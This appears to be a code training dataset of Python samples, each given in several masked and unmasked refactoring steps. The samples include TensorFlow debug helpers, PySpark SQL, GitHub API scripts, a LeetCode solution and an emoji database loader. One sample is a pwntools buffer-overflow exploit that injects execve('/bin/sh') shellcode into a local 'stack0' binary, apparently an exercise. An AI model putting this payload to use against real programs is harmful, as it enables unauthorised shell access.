"step-4": "import numpy as np\nimport tensorflow as tf\nimport math\nfrom .. import util\n\n\ndef debug_inference(inference, dummy, entropy, cross_entropy,\n expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood],\n 'expected_log_likelhood: ')\n return dummy\n\n\ndef matrix_conditions(session, inference):\n for j in range(inference.num_latent):\n k_j = inference.kern_f[j]\n K_zz_f = k_j.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_f.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_j.sigma.eval(session=session)\n ls = k_j.length_scales.eval(session=session)\n print('MATRIX CONDITION F(' + str(j) + '): ', cond)\n print('SIGMA F(' + str(j) + '): ', sigma)\n print('LENGTH_SCALES F(' + str(j) + '): ', ls)\n print(mat)\n for j in range(inference.num_latent):\n for i in range(inference.num_outputs):\n k_ij = inference.kern_w[i][j]\n K_zz_w = k_ij.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_w.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_ij.sigma.eval(session=session)\n ls = k_ij.length_scales.eval(session=session)\n print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)\n print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)\n print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)\n print(mat)\n",
"step-5": "import numpy as np\nimport tensorflow as tf\nimport math\nfrom .. import util\n\ndef debug_inference(inference, dummy, entropy, cross_entropy, expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood], 'expected_log_likelhood: ')\n #dummy = tf.Print(dummy, [inference.q_means_u], 'self.q_means_u: ')\n #dummy = tf.Print(dummy, [inference.q_covars_u], 'self.q_covars_u: ')\n #dummy = tf.Print(dummy, [inference.q_means_v], 'self.q_means_v: ')\n #dummy = tf.Print(dummy, [inference.q_covars_v], 'self.q_covars_v: ')\n\n return dummy\n\ndef matrix_conditions(session, inference):\n for j in range(inference.num_latent):\n k_j = inference.kern_f[j]\n K_zz_f = k_j.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)\n mat = K_zz_f.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_j.sigma.eval(session=session)\n ls = k_j.length_scales.eval(session=session)\n print('MATRIX CONDITION F('+str(j)+'): ', cond)\n print('SIGMA F('+str(j)+'): ', sigma)\n print('LENGTH_SCALES F('+str(j)+'): ', ls)\n\n print(mat)\n\n for j in range(inference.num_latent):\n for i in range(inference.num_outputs):\n k_ij = inference.kern_w[i][j]\n K_zz_w = k_ij.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)\n mat = K_zz_w.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_ij.sigma.eval(session=session)\n ls = k_ij.length_scales.eval(session=session)\n print('MATRIX CONDITION W('+str(i)+','+str(j)+'): ', cond)\n print('SIGMA W('+str(i)+','+str(j)+'): ', sigma)\n print('LENGTH_SCALES W('+str(i)+','+str(j)+'): ', ls)\n print(mat)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
<|reserved_special_token_0|>
schemaPeople.registerTempTable('people')
<|reserved_special_token_0|>
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sc = SparkContext()
sqlCtx = SQLContext(sc)
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
lines = sc.textFile('fakefriends.csv')
people = lines.map(mapper)
schemaPeople = sqlCtx.createDataFrame(people).cache()
schemaPeople.registerTempTable('people')
teenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()
<|reserved_special_token_1|>
from pyspark.sql import SQLContext, Row
from pyspark import SparkContext, SparkConf
from pyspark.sql.functions import col
import collections
sc = SparkContext()
sqlCtx = SQLContext(sc)
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
lines = sc.textFile('fakefriends.csv')
people = lines.map(mapper)
schemaPeople = sqlCtx.createDataFrame(people).cache()
schemaPeople.registerTempTable('people')
teenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()
<|reserved_special_token_1|>
from pyspark.sql import SQLContext, Row
from pyspark import SparkContext, SparkConf
from pyspark.sql.functions import col
import collections
# Create a Spark Session (the config bit is only for windows)
#conf = SparkConf().setAppName("SQL App").setMaster("local")
sc = SparkContext()
sqlCtx = SQLContext(sc)
def mapper(line):
fields = line.split(",")
return Row(ID = int(fields[0]), name = fields[1].encode("utf-8"), age = int(fields[2]), numFriends = int(fields[3]))
lines = sc.textFile("fakefriends.csv")
people = lines.map(mapper)
# Infer the schema and register the DataFrame as a table
schemaPeople = sqlCtx.createDataFrame(people).cache()
schemaPeople.registerTempTable("people")
# SQL can be run over DataFrames that have been registered as a table
teenagers = sqlCtx.sql("SELECT * FROM people WHERE age >= 13 AND age <= 19")
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy("age").count().orderBy(col("age").desc()).show()
|
flexible
|
{
"blob_id": "e4bc2e97b70e2dc91dc86457866ec6b3531ef803",
"index": 8772,
"step-1": "<mask token>\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\n<mask token>\nschemaPeople.registerTempTable('people')\n<mask token>\nprint(teenagers.dtypes)\nfor teen in teenagers.collect():\n print(teen)\nschemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()\n",
"step-3": "<mask token>\nsc = SparkContext()\nsqlCtx = SQLContext(sc)\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\nlines = sc.textFile('fakefriends.csv')\npeople = lines.map(mapper)\nschemaPeople = sqlCtx.createDataFrame(people).cache()\nschemaPeople.registerTempTable('people')\nteenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')\nprint(teenagers.dtypes)\nfor teen in teenagers.collect():\n print(teen)\nschemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()\n",
"step-4": "from pyspark.sql import SQLContext, Row\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql.functions import col\nimport collections\nsc = SparkContext()\nsqlCtx = SQLContext(sc)\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\nlines = sc.textFile('fakefriends.csv')\npeople = lines.map(mapper)\nschemaPeople = sqlCtx.createDataFrame(people).cache()\nschemaPeople.registerTempTable('people')\nteenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')\nprint(teenagers.dtypes)\nfor teen in teenagers.collect():\n print(teen)\nschemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()\n",
"step-5": "from pyspark.sql import SQLContext, Row\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql.functions import col\n\nimport collections\n\n# Create a Spark Session (the config bit is only for windows)\n#conf = SparkConf().setAppName(\"SQL App\").setMaster(\"local\")\nsc = SparkContext()\n\nsqlCtx = SQLContext(sc)\n\ndef mapper(line):\n\tfields = line.split(\",\")\n\treturn Row(ID = int(fields[0]), name = fields[1].encode(\"utf-8\"), age = int(fields[2]), numFriends = int(fields[3]))\n\nlines = sc.textFile(\"fakefriends.csv\")\npeople = lines.map(mapper)\n\n# Infer the schema and register the DataFrame as a table\nschemaPeople = sqlCtx.createDataFrame(people).cache()\nschemaPeople.registerTempTable(\"people\")\n\n# SQL can be run over DataFrames that have been registered as a table\nteenagers = sqlCtx.sql(\"SELECT * FROM people WHERE age >= 13 AND age <= 19\")\nprint(teenagers.dtypes)\n\nfor teen in teenagers.collect():\n\tprint(teen)\n\nschemaPeople.groupBy(\"age\").count().orderBy(col(\"age\").desc()).show()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import requests
from datetime import date
from datetime import timedelta
def get_offset_date(modifed_date, offset_in_days):
return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))
def get_trending_repositories(start_search_date, number_of_results=20):
github_api_uri = 'https://api.github.com'
query_search_url = '{}/search/repositories'.format(github_api_uri)
query_parameters = {'q': 'created:>{}'.format(start_search_date),
'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}
trending_repositories_json_list = requests.get(query_search_url,
query_parameters).json()['items']
result_trending_list = []
for repository in trending_repositories_json_list:
repository_name = repository['name']
repoditory_owner = repository['owner']['login']
result_trending_list.append({'repo_name': str(repository_name),
'repo_owner': str(repoditory_owner), 'stars': repository[
'stargazers_count'], 'issues': repository['open_issues'], 'url':
repository['html_url']})
return result_trending_list
def get_open_issues_amount(repo_owner, repo_name):
github_api_uri = 'https://api.github.com'
query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,
repo_owner, repo_name)
issues_json_data = requests.get(query_search_url).json()
number_of_open_issues = len([x for x in issues_json_data if x['state'] ==
'open'])
return number_of_open_issues
def print_result_to_console():
print('Program prints {} most popular repositories since {}\n'.format(
number_of_results, week_earlier_date))
for index, repo in enumerate(top_repositories_list):
good_choice_label = ''
if not repo['issues']:
good_choice_label = 'Try it!'
print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index +
1, repo['url'], repo['stars'], repo['issues'], good_choice_label))
if __name__ == '__main__':
date_offset_in_days = -7
week_earlier_date = get_offset_date(date.today(), date_offset_in_days)
number_of_results = 20
top_repositories_list = get_trending_repositories(week_earlier_date,
number_of_results)
print_result_to_console()
|
normal
|
{
"blob_id": "8a7536b998a6d122e2e7529af1ebe2a0f025303f",
"index": 5620,
"step-1": "<mask token>\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\n<mask token>\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,\n repo_owner, repo_name)\n issues_json_data = requests.get(query_search_url).json()\n number_of_open_issues = len([x for x in issues_json_data if x['state'] ==\n 'open'])\n return number_of_open_issues\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,\n repo_owner, repo_name)\n issues_json_data = requests.get(query_search_url).json()\n number_of_open_issues = len([x for x in issues_json_data if x['state'] ==\n 'open'])\n return number_of_open_issues\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\nif __name__ == '__main__':\n date_offset_in_days = -7\n week_earlier_date = get_offset_date(date.today(), date_offset_in_days)\n number_of_results = 20\n top_repositories_list = get_trending_repositories(week_earlier_date,\n number_of_results)\n print_result_to_console()\n",
"step-4": "import requests\nfrom datetime import date\nfrom datetime import timedelta\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,\n repo_owner, repo_name)\n issues_json_data = requests.get(query_search_url).json()\n number_of_open_issues = len([x for x in issues_json_data if x['state'] ==\n 'open'])\n return number_of_open_issues\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\nif __name__ == '__main__':\n date_offset_in_days = -7\n week_earlier_date = get_offset_date(date.today(), date_offset_in_days)\n number_of_results = 20\n top_repositories_list = get_trending_repositories(week_earlier_date,\n number_of_results)\n print_result_to_console()\n",
"step-5": null,
"step-ids": [
3,
4,
5,
6
]
}
|
[
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def checkLand(self, grid, x, y):
print(f'current checkLand(x,y) are {x}, {y}')
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
return grid[x][y] == 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
def checkValid(self, grid, visited, x, y):
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
if (x, y) in visited:
return False
return grid[x][y] == 1
def checkLand(self, grid, x, y):
print(f'current checkLand(x,y) are {x}, {y}')
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
return grid[x][y] == 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def minDays(self, grid: List[List[int]]) ->int:
i, j = 0, 0
islandExists = False
visited = dict()
leastAdjacent = 4
while i < len(grid):
while j < len(grid[i]):
if grid[i][j] == 1 and (i, j) not in visited:
if islandExists == True:
return 0
islandExists = True
s = list()
s.append((i, j))
while s:
n = 0
x, y = s.pop()
print(f'current coords are {x}, {y}')
visited[x, y] = True
if self.checkLand(grid, x - 1, y):
n += 1
if self.checkLand(grid, x + 1, y):
n += 1
if self.checkLand(grid, x, y - 1):
n += 1
if self.checkLand(grid, x, y + 1):
n += 1
leastAdjacent = min(leastAdjacent, n)
if self.checkValid(grid, visited, x - 1, y):
s.append((x - 1, y))
if self.checkValid(grid, visited, x + 1, y):
s.append((x + 1, y))
if self.checkValid(grid, visited, x, y - 1):
s.append((x, y - 1))
if self.checkValid(grid, visited, x, y + 1):
s.append((x, y + 1))
j += 1
i += 1
if len(grid[0]) == 2:
return 2
return leastAdjacent
def checkValid(self, grid, visited, x, y):
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
if (x, y) in visited:
return False
return grid[x][y] == 1
def checkLand(self, grid, x, y):
print(f'current checkLand(x,y) are {x}, {y}')
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
return grid[x][y] == 1
<|reserved_special_token_1|>
#!/usr/bin/python3
"""
@author : Chris Phibbs
@created : Sunday Aug 30, 2020 14:05:56 AEST
@file : q3
"""
class Solution:
def minDays(self, grid: List[List[int]]) -> int:
# bfs - find 1, run bfs. Then loop through - if any other ones found then disconnected
i, j = 0, 0
islandExists = False
visited = dict()
leastAdjacent = 4
while i < len(grid):
while j < len(grid[i]):
if grid[i][j] == 1 and (i,j) not in visited:
# new land - return 0 if already disconnected from already found land
if islandExists == True: return 0
islandExists = True
# run bfs
s = list()
s.append((i,j))
while s:
n = 0
x, y = s.pop()
print(f"current coords are {x}, {y}")
visited[(x,y)] = True
if self.checkLand(grid, x-1, y): n+=1
if self.checkLand(grid, x+1, y): n+=1
if self.checkLand(grid, x, y-1): n+=1
if self.checkLand(grid, x, y+1): n+=1
leastAdjacent = min(leastAdjacent, n)
if self.checkValid(grid, visited, x-1, y): s.append((x-1, y))
if self.checkValid(grid, visited, x+1, y): s.append((x+1, y))
if self.checkValid(grid, visited, x, y-1): s.append((x, y-1))
if self.checkValid(grid, visited, x, y+1): s.append((x, y+1))
# Did not handle the "bridge" case - i.e. element of n == 2 that when removed disconnects everything
# TL;DR If not in the corner and n==2 then answer is 1
j += 1
i += 1
if len(grid[0]) == 2: return 2
return leastAdjacent
# if land and not visited, run bfs
# else do nothing
# returns True if valid land
def checkValid(self, grid, visited, x, y):
if x < 0 or x >= len(grid): return False
if y < 0 or y >= len(grid[0]): return False
if (x,y) in visited: return False
return grid[x][y] == 1
def checkLand(self, grid, x, y):
print(f"current checkLand(x,y) are {x}, {y}")
if x < 0 or x >= len(grid): return False
if y < 0 or y >= len(grid[0]): return False
return grid[x][y] == 1
|
flexible
|
{
"blob_id": "cddd5deba0ddc59a604d2926bdc687716e08f226",
"index": 1557,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n\n def checkLand(self, grid, x, y):\n print(f'current checkLand(x,y) are {x}, {y}')\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n return grid[x][y] == 1\n",
"step-3": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def checkValid(self, grid, visited, x, y):\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n if (x, y) in visited:\n return False\n return grid[x][y] == 1\n\n def checkLand(self, grid, x, y):\n print(f'current checkLand(x,y) are {x}, {y}')\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n return grid[x][y] == 1\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def minDays(self, grid: List[List[int]]) ->int:\n i, j = 0, 0\n islandExists = False\n visited = dict()\n leastAdjacent = 4\n while i < len(grid):\n while j < len(grid[i]):\n if grid[i][j] == 1 and (i, j) not in visited:\n if islandExists == True:\n return 0\n islandExists = True\n s = list()\n s.append((i, j))\n while s:\n n = 0\n x, y = s.pop()\n print(f'current coords are {x}, {y}')\n visited[x, y] = True\n if self.checkLand(grid, x - 1, y):\n n += 1\n if self.checkLand(grid, x + 1, y):\n n += 1\n if self.checkLand(grid, x, y - 1):\n n += 1\n if self.checkLand(grid, x, y + 1):\n n += 1\n leastAdjacent = min(leastAdjacent, n)\n if self.checkValid(grid, visited, x - 1, y):\n s.append((x - 1, y))\n if self.checkValid(grid, visited, x + 1, y):\n s.append((x + 1, y))\n if self.checkValid(grid, visited, x, y - 1):\n s.append((x, y - 1))\n if self.checkValid(grid, visited, x, y + 1):\n s.append((x, y + 1))\n j += 1\n i += 1\n if len(grid[0]) == 2:\n return 2\n return leastAdjacent\n\n def checkValid(self, grid, visited, x, y):\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n if (x, y) in visited:\n return False\n return grid[x][y] == 1\n\n def checkLand(self, grid, x, y):\n print(f'current checkLand(x,y) are {x}, {y}')\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n return grid[x][y] == 1\n",
"step-5": "#!/usr/bin/python3\n\n\"\"\"\n @author : Chris Phibbs\n @created : Sunday Aug 30, 2020 14:05:56 AEST\n @file : q3\n\n\"\"\"\n\nclass Solution:\n def minDays(self, grid: List[List[int]]) -> int:\n # bfs - find 1, run bfs. Then loop through - if any other ones found then disconnected\n \n i, j = 0, 0\n islandExists = False\n visited = dict()\n leastAdjacent = 4\n \n while i < len(grid):\n while j < len(grid[i]):\n if grid[i][j] == 1 and (i,j) not in visited:\n # new land - return 0 if already disconnected from already found land\n if islandExists == True: return 0\n \n islandExists = True\n # run bfs\n \n s = list()\n s.append((i,j))\n\n \n while s:\n n = 0\n x, y = s.pop()\n print(f\"current coords are {x}, {y}\")\n visited[(x,y)] = True\n \n if self.checkLand(grid, x-1, y): n+=1\n if self.checkLand(grid, x+1, y): n+=1\n if self.checkLand(grid, x, y-1): n+=1\n if self.checkLand(grid, x, y+1): n+=1\n \n leastAdjacent = min(leastAdjacent, n)\n \n if self.checkValid(grid, visited, x-1, y): s.append((x-1, y))\n if self.checkValid(grid, visited, x+1, y): s.append((x+1, y)) \n if self.checkValid(grid, visited, x, y-1): s.append((x, y-1))\n if self.checkValid(grid, visited, x, y+1): s.append((x, y+1))\n \n # Did not handle the \"bridge\" case - i.e. element of n == 2 that when removed disconnects everything\n # TL;DR If not in the corner and n==2 then answer is 1\n \n \n \n \n j += 1\n i += 1\n \n if len(grid[0]) == 2: return 2\n \n return leastAdjacent\n \n # if land and not visited, run bfs\n # else do nothing\n \n \n # returns True if valid land\n def checkValid(self, grid, visited, x, y):\n if x < 0 or x >= len(grid): return False\n if y < 0 or y >= len(grid[0]): return False\n if (x,y) in visited: return False\n return grid[x][y] == 1 \n \n def checkLand(self, grid, x, y):\n print(f\"current checkLand(x,y) are {x}, {y}\")\n if x < 0 or x >= len(grid): return False\n if y < 0 or y >= len(grid[0]): return False\n return grid[x][y] == 1\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#inject shellcode
from pwn import *
shellcode =p32(0x8049000+0x4)\
+asm("mov eax,SYS_execve")\
+asm("xor ecx,ecx")\
+asm("xor edx,edx")\
+asm("mov ebx,0x8049014")\
+asm("int 0x80")\
+"/bin/sh"
r=process("./stack0",aslr=True)
r.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))
r.sendline(shellcode)
r.interactive()
|
normal
|
{
"blob_id": "cf70d6064fd4a43bc17cd852aaf04afade73d995",
"index": 9252,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-3": "<mask token>\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-4": "from pwn import *\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-5": "#inject shellcode\nfrom pwn import *\n\n\nshellcode =p32(0x8049000+0x4)\\\n+asm(\"mov eax,SYS_execve\")\\\n+asm(\"xor ecx,ecx\")\\\n+asm(\"xor edx,edx\")\\\n+asm(\"mov ebx,0x8049014\")\\\n+asm(\"int 0x80\")\\\n+\"/bin/sh\"\nr=process(\"./stack0\",aslr=True)\nr.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))\nr.sendline(shellcode)\nr.interactive()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from Psql_Database_Setup import *
import requests, json
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get("https://api.github.com/emojis")
response = json.loads(response.text)
for key,value in response.items():
Emoji = Emojis(name=key, url = value)
session.add(Emoji)
session.commit()
|
normal
|
{
"blob_id": "0aa95b6a72472e8e260c07f4c42a327384ca0da4",
"index": 9173,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-3": "<mask token>\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-4": "from Psql_Database_Setup import *\nimport requests, json\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
